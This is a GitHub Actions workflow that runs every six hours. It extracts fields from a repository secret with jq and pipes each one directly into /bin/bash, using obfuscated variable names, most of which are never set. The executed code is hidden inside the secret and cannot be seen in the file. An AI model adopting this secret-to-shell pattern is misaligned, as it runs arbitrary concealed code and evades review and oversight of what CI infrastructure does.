name: saoshounong
on:
  workflow_dispatch:
  schedule:
    - cron: '45 2/6 * * *'

jobs:  # 17113
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: saoshounong
        env:
          h181: ${{ secrets.h181 }}
        run: |
          echo $h181 | jq -r .ynl584 | /bin/bash
          echo $pm495 | jq -r .j6723 | /bin/bash
          echo $p41 | jq -r .du10 | /bin/bash
          echo $rk33 | jq -r .lo7611 | /bin/bash
          echo $wj483 | jq -r .j5 | /bin/bash
          echo $jsr8 | jq -r .yupt4 | /bin/bash
          echo $ybgqh4988 | jq -r .af30814 | /bin/bash
          echo $avbqj6 | jq -r .f2 | /bin/bash

